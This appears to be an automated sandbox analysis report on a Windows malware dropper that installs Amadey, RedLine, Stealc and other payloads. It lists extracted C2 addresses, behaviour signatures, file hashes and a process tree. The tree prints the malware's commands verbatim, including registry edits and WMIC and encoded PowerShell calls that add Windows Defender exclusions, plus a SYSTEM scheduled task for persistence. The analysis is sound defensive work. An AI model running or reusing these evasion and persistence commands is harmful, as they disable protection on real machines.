Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    31-08-2024 19:09

General

  • Target

    61b4f2c2300e908a1d7223c88efcaff312b13ff52bfda9c141627d90ce6cef33.exe

  • Size

    1.8MB

  • MD5

    632dc96011c7eb441c2a64096079b236

  • SHA1

    6cc50be144e82a81b67d0d14221095804b557f91

  • SHA256

    61b4f2c2300e908a1d7223c88efcaff312b13ff52bfda9c141627d90ce6cef33

  • SHA512

    f4675e0943eee98503edb1cb2217c94eef332694d42b728bb0549537e15df24350c7d4f43433b187d0bc90c26af4d2edaf61bbd4fffc66acdfe52e6584f09e36

  • SSDEEP

    49152:zWyp+cYR/PGRfgItpjNIDtHIITIXvdoQeMilmGIkMX:zWx/PSfP+pH3+XilI/

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

C2

95.179.250.45:26212

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

65.21.18.51:45580

Extracted

Family

stealc

Botnet

default2

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

amadey

Version

4.41

Botnet

1176f2

C2

http://185.215.113.19

Attributes
  • install_dir

    417fd29867

  • install_file

    ednfoki.exe

  • strings_key

    183201dc3defc4394182b4bff63c4065

  • url_paths

    /CoreOPT/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects ZharkBot payload 1 IoCs

    ZharkBot is a botnet written C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • ZharkBot

    ZharkBot is a botnet written C++.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 9 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 4 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Indirect Command Execution 1 TTPs 6 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 3 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 46 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 35 IoCs
  • Suspicious use of AdjustPrivilegeToken 62 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\61b4f2c2300e908a1d7223c88efcaff312b13ff52bfda9c141627d90ce6cef33.exe
    "C:\Users\Admin\AppData\Local\Temp\61b4f2c2300e908a1d7223c88efcaff312b13ff52bfda9c141627d90ce6cef33.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:4744
    • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:648
      • C:\Users\Admin\AppData\Local\Temp\1000002001\crypted.exe
        "C:\Users\Admin\AppData\Local\Temp\1000002001\crypted.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2760
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3796
      • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
        "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4868
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
            PID:4256
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            4⤵
              PID:1588
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1348
              • C:\Users\Admin\AppData\Roaming\rVczotwfJw.exe
                "C:\Users\Admin\AppData\Roaming\rVczotwfJw.exe"
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4028
              • C:\Users\Admin\AppData\Roaming\Rm8QXQNtwJ.exe
                "C:\Users\Admin\AppData\Roaming\Rm8QXQNtwJ.exe"
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:820
          • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
            "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
            3⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1400
            • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
              "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2340
              • C:\Users\Admin\AppData\Local\Temp\1000011001\joffer2.exe
                "C:\Users\Admin\AppData\Local\Temp\1000011001\joffer2.exe"
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                PID:2564
                • C:\Users\Admin\AppData\Local\Temp\service123.exe
                  "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1052
          • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:2808
          • C:\Users\Admin\AppData\Local\Temp\1000129001\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\1000129001\Setup.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            PID:1996
            • C:\Users\Admin\AppData\Local\Temp\service123.exe
              "C:\Users\Admin\AppData\Local\Temp\service123.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:2804
          • C:\Users\Admin\AppData\Local\Temp\1000191001\BitcoinCore.exe
            "C:\Users\Admin\AppData\Local\Temp\1000191001\BitcoinCore.exe"
            3⤵
            • Executes dropped EXE
            PID:1132
          • C:\Users\Admin\AppData\Local\Temp\1000228001\PureSyncInst.exe
            "C:\Users\Admin\AppData\Local\Temp\1000228001\PureSyncInst.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:1420
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:4528
          • C:\Users\Admin\1000238002\Amadeus.exe
            "C:\Users\Admin\1000238002\Amadeus.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2084
            • C:\Users\Admin\AppData\Local\Temp\1000260001\Channel1.exe
              "C:\Users\Admin\AppData\Local\Temp\1000260001\Channel1.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              PID:1792
            • C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe
              "C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:5064
              • C:\Users\Admin\AppData\Local\Temp\7zSF22B.tmp\Install.exe
                .\Install.exe
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:4968
                • C:\Users\Admin\AppData\Local\Temp\7zSF45E.tmp\Install.exe
                  .\Install.exe /PsFGQdidqwCo "385107" /S
                  6⤵
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Enumerates system info in registry
                  PID:3616
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:4900
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                      8⤵
                      • Indirect Command Execution
                      • System Location Discovery: System Language Discovery
                      PID:3696
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                        9⤵
                        • System Location Discovery: System Language Discovery
                        PID:2008
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                          10⤵
                          • System Location Discovery: System Language Discovery
                          PID:3272
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                      8⤵
                      • Indirect Command Execution
                      • System Location Discovery: System Language Discovery
                      PID:5248
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                        9⤵
                        • System Location Discovery: System Language Discovery
                        PID:468
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                          10⤵
                          • System Location Discovery: System Language Discovery
                          PID:3484
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                      8⤵
                      • Indirect Command Execution
                      • System Location Discovery: System Language Discovery
                      PID:5980
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                        9⤵
                        • System Location Discovery: System Language Discovery
                        PID:5484
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                          10⤵
                          • System Location Discovery: System Language Discovery
                          PID:4928
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                      8⤵
                      • Indirect Command Execution
                      • System Location Discovery: System Language Discovery
                      PID:5288
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                        9⤵
                        • System Location Discovery: System Language Discovery
                        PID:6020
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                          10⤵
                          • System Location Discovery: System Language Discovery
                          PID:4988
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                      8⤵
                      • Indirect Command Execution
                      • System Location Discovery: System Language Discovery
                      PID:5020
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                        9⤵
                        • System Location Discovery: System Language Discovery
                        PID:5948
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                          10⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:6032
                          • C:\Windows\SysWOW64\gpupdate.exe
                            "C:\Windows\system32\gpupdate.exe" /force
                            11⤵
                            • System Location Discovery: System Language Discovery
                            PID:5076
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                    7⤵
                    • Indirect Command Execution
                    • System Location Discovery: System Language Discovery
                    PID:4416
                    • C:\Windows\SysWOW64\cmd.exe
                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:5556
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:6044
                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                          10⤵
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2368
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /CREATE /TN "bISIDNXXYteSJEZXLD" /SC once /ST 19:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSF45E.tmp\Install.exe\" W7 /yttSdidokD 385107 /S" /V1 /F
                    7⤵
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:5768
            • C:\Users\Admin\AppData\Local\Temp\1000267001\52i.exe
              "C:\Users\Admin\AppData\Local\Temp\1000267001\52i.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:1528
            • C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe
              "C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4572
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4572 -s 508
                5⤵
                • Program crash
                PID:3908
          • C:\Users\Admin\AppData\Local\Temp\1000239001\runtime.exe
            "C:\Users\Admin\AppData\Local\Temp\1000239001\runtime.exe"
            3⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2628
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              4⤵
                PID:3400
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:4280
            • C:\Users\Admin\AppData\Local\Temp\1000241001\build.exe
              "C:\Users\Admin\AppData\Local\Temp\1000241001\build.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4836
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          1⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:1168
        • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
          C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
          1⤵
          • Executes dropped EXE
          PID:2288
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          1⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:5256
        • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
          C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
          1⤵
          • Executes dropped EXE
          PID:5264
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4572 -ip 4572
          1⤵
            PID:3092
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUA
            1⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5600
          • C:\Users\Admin\AppData\Roaming\Guid\TypeId.exe
            C:\Users\Admin\AppData\Roaming\Guid\TypeId.exe
            1⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of AdjustPrivilegeToken
            PID:2668
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
              2⤵
                PID:3948

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ProgramData\mozglue.dll

              Filesize

              593KB

              MD5

              c8fd9be83bc728cc04beffafc2907fe9

              SHA1

              95ab9f701e0024cedfbd312bcfe4e726744c4f2e

              SHA256

              ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

              SHA512

              fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

            • C:\ProgramData\nss3.dll

              Filesize

              2.0MB

              MD5

              1cc453cdf74f31e4d913ff9c10acdde2

              SHA1

              6e85eae544d6e965f15fa5c39700fa7202f3aafe

              SHA256

              ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

              SHA512

              dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

            • C:\Users\Admin\1000238002\Amadeus.exe

              Filesize

              425KB

              MD5

              ced97d60021d4a0bfa03ee14ec384c12

              SHA1

              7af327df2a2d1e0e09034c2bdf6a47f788cec4e4

              SHA256

              9e06eed4e1237ffdc84f0ff666fbe4b39e1bd2c60bd542870f7e1bfb10555951

              SHA512

              af0a02daa759010a1edfc78f14c5fe321c10802d0b9df55b515fe501114af0835a05bbd5dd5e2167b4b1f39bb6da787343bf9141d5f811113f71749741b47811

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

              Filesize

              1KB

              MD5

              5b74da6778ccaa0e1ca4ae7484775943

              SHA1

              0a2f6f315a0ca1a0366b509aec7b13c606645654

              SHA256

              172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78

              SHA512

              20b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              15KB

              MD5

              e738b4051a20264e21344606f5f22b54

              SHA1

              67544b8c42f0e63d75f16a863a8af813a01fb52e

              SHA256

              4261d0c0e91257d3496faf46071e8d69c22645dd3b5ade502183233303e7242d

              SHA512

              f5c783f864c96c7b341bc8f979f9b7dd65bf6f2beb2ebae3369cc78e732d9ad9245c07d82f6c7317c38afbabacf4dc62631570fcc8311671d2557006ea987bc3

            • C:\Users\Admin\AppData\Local\Temp\1000002001\crypted.exe

              Filesize

              314KB

              MD5

              6134586375c01f97f8777bae1bf5ed98

              SHA1

              4787fa996b75dbc54632cc321725ee62666868a1

              SHA256

              414becb8aabd4e8c406e84df062bee1a45cffa334ae30022078cfa71da9e330d

              SHA512

              652ed16d96b5700f105c2bab8e7258f167bc1615b6397be7340c08df7c977842844326e07fdef677aecfaf07263f99bb7968c9fc926e90e5a33d2ed793f8436b

            • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe

              Filesize

              1.1MB

              MD5

              8e74497aff3b9d2ddb7e7f819dfc69ba

              SHA1

              1d18154c206083ead2d30995ce2847cbeb6cdbc1

              SHA256

              d8e81d9e336ef37a37cae212e72b6f4ef915db4b0f2a8df73eb584bd25f21e66

              SHA512

              9aacc5c130290a72f1087daa9e79984565ccab6dbcad5114bfed0919812b9ba5f8dee9c37d230eeca4df3cca47ba0b355fbf49353e53f10f0ebc266e93f49f97

            • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe

              Filesize

              416KB

              MD5

              f5d7b79ee6b6da6b50e536030bcc3b59

              SHA1

              751b555a8eede96d55395290f60adc43b28ba5e2

              SHA256

              2f1aff28961ba0ce85ea0e35b8936bc387f84f459a4a1d63d964ce79e34b8459

              SHA512

              532b17cd2a6ac5172b1ddba1e63edd51ab53a4527204415241e3a78e8ffeb9728071bde5ae1eefabefd2627f00963f8a5458668cd7b8df041c8683252ff56b46

            • C:\Users\Admin\AppData\Local\Temp\1000011001\joffer2.exe

              Filesize

              6.3MB

              MD5

              4386df2790a9752e9cf0424dca91ad15

              SHA1

              22da8886a1bf7823fa759540cf88f3e3f1b42671

              SHA256

              e2f0e525c66dba847bedf887398405348159ce607bc6cc826bef73651fd7135d

              SHA512

              0afe4bf35665de41f96c3beeb13688428c840f4501fbc91285dbecf43e9204b2f921966194ea31655a48467620b7e364367684bb50274bd576955ca958b6fe9b

            • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe

              Filesize

              187KB

              MD5

              7a02aa17200aeac25a375f290a4b4c95

              SHA1

              7cc94ca64268a9a9451fb6b682be42374afc22fd

              SHA256

              836799fd760eba25e15a55c75c50b977945c557065a708317e00f2c8f965339e

              SHA512

              f6ebfe7e087aa354722cea3fddd99b1883a862fb92bb5a5a86782ea846a1bff022ab7db4397930bcabaa05cb3d817de3a89331d41a565bc1da737f2c5e3720b6

            • C:\Users\Admin\AppData\Local\Temp\1000129001\Setup.exe

              Filesize

              6.4MB

              MD5

              3b99c5464631ad74c76680196c3c64d9

              SHA1

              d631bc593e3e76215f15c4cd8244828225c12329

              SHA256

              33a7fabaceac3e73239ced3eec7c67fa0f17987e4d03fef30161b06564f6d8f9

